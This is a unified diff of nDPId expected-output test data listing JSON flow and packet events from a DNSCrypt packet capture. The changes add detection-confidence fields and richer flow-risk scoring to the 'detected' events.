 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":31,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAIcHPxAAL0RYFoKAAABuYbEN+gNIPsCCECUfx0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAIcHP1AAL0RYFkKAAABuYbEN8UDIPsCCECUfxsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHP4gAL0RfJgKAAABuYbEN9dTIPsGBAJxfx4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":35,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHP4Aub0RoWsKAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":35,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739304360,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739304360,"pkt":"ZmZmZmZmRERERERECABFAADWmUJAADQRblq5hsQ3CgAAASD7xQMAwuTIfxuAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"}
@@ -91,24 +91,24 @@
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739304362,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739304362,"pkt":"ZmZmZmZmRERERERECABFAADWmUNAADQRblm5hsQ3CgAAASD70cEAwtgLfxqAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylFAAL0RDRQKAAABaO66wK6oAbsCCOaEZFgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylIgAL0RKVMKAAABaO66wN6lAbsGBMqkZFUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":42,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAABQylIAub0RTiYKAAABaO66wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":42,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
